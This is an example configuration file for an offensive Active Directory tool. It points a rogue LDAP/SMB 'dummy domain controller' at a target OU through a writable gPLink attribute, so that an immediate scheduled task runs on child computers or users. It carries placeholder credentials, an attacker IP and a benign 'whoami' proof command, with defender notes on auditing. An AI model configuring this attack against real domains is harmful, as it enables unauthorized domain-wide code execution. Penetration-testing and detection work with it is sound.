# config.example.ini - sample values only; every value below is a placeholder to be replaced in a private copy.
# This file stores credentials in cleartext: keep the filled-in copy out of version control and restrict
# its file permissions to the account that runs the tool.
# NOTE(review): if the file is parsed with Python configparser and default interpolation, a literal %
# in a value (e.g. a password) must be written %% - confirm against the parser the tool uses.
[GENERAL]
# The target domain name
domain=corp.com
# The target DC. If not specified, defaults to the domain name
#dc=192.168.123.10
# The Distinguished Name of the target container
containerDN=OU=SERVERS,DC=corp,DC=com
# The username and password of the user that has write permission on the gPLink attribute of the target container.
# Defender note: that delegated write on gPLink is the precondition this configuration depends on; review which
# principals hold it on each OU and audit modifications of the attribute.
username=naugustine
password=Password1
# The IP address of the attacker machine on the internal network
attacker_ip=192.168.123.16
# The command that should be executed by child objects. Specifying a command will inject an immediate Scheduled Task.
# The sample value only writes the output of whoami to a marker file as proof of execution.
# Defender note: scheduled-task creation auditing on the hosts under the container is a detection point for this step.
command=whoami > C:\poc.txt
# As an alternative to the 'command' option, you can provide a module file written in the GroupPolicyBackdoor syntax - see https://github.com/synacktiv/GroupPolicyBackdoor/wiki. 'command' and 'module' are mutually exclusive
# module=Scheduledtask_add_computer.ini
# The kind of objects targeted ("computer" or "user")
target_type=computer
# Settings for the dummy domain controller that plays the LDAP server role and delivers the GPC.
# Defender note: presumably the gPLink value on the target container ends up referencing this host instead of a
# legitimate domain controller - TODO confirm; a gPLink whose LDAP path names an unexpected host is worth alerting on.
[LDAP]
# The IP address of the dummy domain controller that will act as an LDAP server
ldap_ip=192.168.125.245
# Optional (used for sanity checks) - the hostname of the dummy domain controller
ldap_hostname=WIN-TTEBC5VH747
# The username and password of a domain administrator on the dummy domain controller (stored in cleartext; sample values)
ldap_username=ldapadm
ldap_password=Password1!
# The ID of the GPO on the dummy domain controller (the GPO can be empty, it only needs to exist)
gpo_id=7B7D6B23-26F8-4E4B-AF23-F9B9005167F6
# The machine account name and password on the target domain that will be used to fake the LDAP server delivering the GPC.
# The password value is a placeholder; the sample text suggests a long random one.
ldap_machine_name=OUNED$
ldap_machine_password=some_very_long_random_password
# Settings for the SMB side, which delivers the GPT. All keys other than smb_mode and share_name are
# commented out in this example and are described as only useful in forwarded mode.
[SMB]
# The SMB mode can be "embedded" or "forwarded", depending on the kind of object targeted
smb_mode=embedded
# The name of the SMB share. Can be anything in embedded mode; must match an existing share on the SMB dummy domain controller in forwarded mode
share_name=synacktiv
# The IP address of the dummy domain controller that will act as an SMB server. Only useful in forwarded mode
#smb_ip=192.168.126.206
# The username and password of a user having write access to the share on the SMB dummy domain controller (cleartext; sample values). Only useful in forwarded mode
#smb_username=smbadm
#smb_password=Password1!
# The machine account name and password on the target domain that will be used to fake the SMB server delivering the GPT. Only useful in forwarded mode
#smb_machine_name=OUNED2$
#smb_machine_password=some_very_long_random_password